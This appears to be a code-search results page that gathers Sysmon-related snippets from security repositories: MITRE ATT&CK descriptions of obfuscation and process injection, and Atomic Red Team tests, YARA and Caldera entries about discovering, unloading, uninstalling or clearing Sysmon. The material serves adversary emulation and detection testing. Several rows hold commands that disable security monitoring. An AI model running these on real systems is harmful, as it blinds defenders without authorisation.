"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", |
© ESET 2014-2018 |
| malware-ioc |
misp-turla-powershell-event.json |
"description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n===Windows===\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)\n* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.\n* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n===Mac and Linux===\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n*'''Ptrace system calls''' can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.\n\nDetection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)\n\nMonitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)\n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)\n\nMonitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring\n\nEffective Permissions: User, Administrator, SYSTEM, root\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator, SYSTEM, root\n\nContributors: Anastasios Pingios", |
© ESET 2014-2018 |
| malware-ioc |
misp-turla-powershell-event.json |
"https://docs.microsoft.com/sysinternals/downloads/sysmon" |
© ESET 2014-2018 |
| atomic-red-team |
index.md |
- Atomic Test #10: Unload Sysmon Filter Driver [windows] |
MIT License. © 2018 Red Canary |
| atomic-red-team |
index.md |
- Atomic Test #11: Uninstall Sysmon [windows] |
MIT License. © 2018 Red Canary |
| atomic-red-team |
index.md |
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows] |
MIT License. © 2018 Red Canary |
| atomic-red-team |
windows-index.md |
- Atomic Test #10: Unload Sysmon Filter Driver [windows] |
MIT License. © 2018 Red Canary |
| atomic-red-team |
windows-index.md |
- Atomic Test #11: Uninstall Sysmon [windows] |
MIT License. © 2018 Red Canary |
| atomic-red-team |
windows-index.md |
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows] |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1518.001.md |
- Atomic Test #5 - Security Software Discovery - Sysmon Service |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1518.001.md |
## Atomic Test #5 - Security Software Discovery - Sysmon Service |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1518.001.md |
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1518.001.md |
when sucessfully executed, the test is going to display sysmon driver instance if it is installed. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
- Atomic Test #10 - Unload Sysmon Filter Driver |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
- Atomic Test #11 - Uninstall Sysmon |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
## Atomic Test #10 - Unload Sysmon Filter Driver |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
run the prereq_command’s and it should fail with an error of “sysmon filter must be loaded”. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | String | SysmonDrv| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
sysmon -u -i > nul 2>&1 |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
sysmon -i -accepteula -i > nul 2>&1 |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
%temp%\Sysmon\sysmon.exe -u > nul 2>&1 |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1 |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
##### Description: Sysmon must be downloaded |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
if ((cmd.exe /c “where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul”) -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
Invoke-WebRequest “https://download.sysinternals.com/files/Sysmon.zip” -OutFile “$env:TEMP\Sysmon.zip” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
Remove-Item $env:TEMP\Sysmon.zip -Force |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
##### Description: sysmon must be Installed |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
if(cmd.exe /c “where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul”) { C:\Windows\Sysmon.exe -accepteula -i } else |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
##### Description: sysmon filter must be loaded |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
sysmon -u |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
sysmon -accepteula -i |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
## Atomic Test #11 - Uninstall Sysmon |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
Uninstall Sysinternals Sysmon for Defense Evasion |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
sysmon -i -accepteula >nul 2>&1 |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
##### Description: Sysmon executable must be available |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
if(cmd /c where sysmon) {exit 0} else {exit 1} |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
$parentpath = Split-Path “#{sysmon_exe}”; $zippath = “$parentpath\Sysmon.zip” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
Invoke-WebRequest “https://download.sysinternals.com/files/Sysmon.zip” -OutFile “$zippath” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
##### Description: Sysmon must be installed |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
if(cmd /c sc query sysmon) { exit 0} else { exit 1} |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
cmd /c sysmon -i -accepteula |
MIT License. © 2018 Red Canary |
| signature-base |
apt_tick_weaponized_usb.yar |
description = “Detects Sysmon Loader from Tick group incident - Weaponized USB” |
CC BY-NC 4.0 |
| stockpile |
7a6ba833-de40-466a-8969-5c37b13603e0.yml |
"sysmon", |
Apache-2.0 |
| stockpile |
fcf71ee3-d1a9-4136-b919-9e5f6da43608.yml |
description: Clear Sysmon logs [intended to trigger CAR-2016-04-002] |
Apache-2.0 |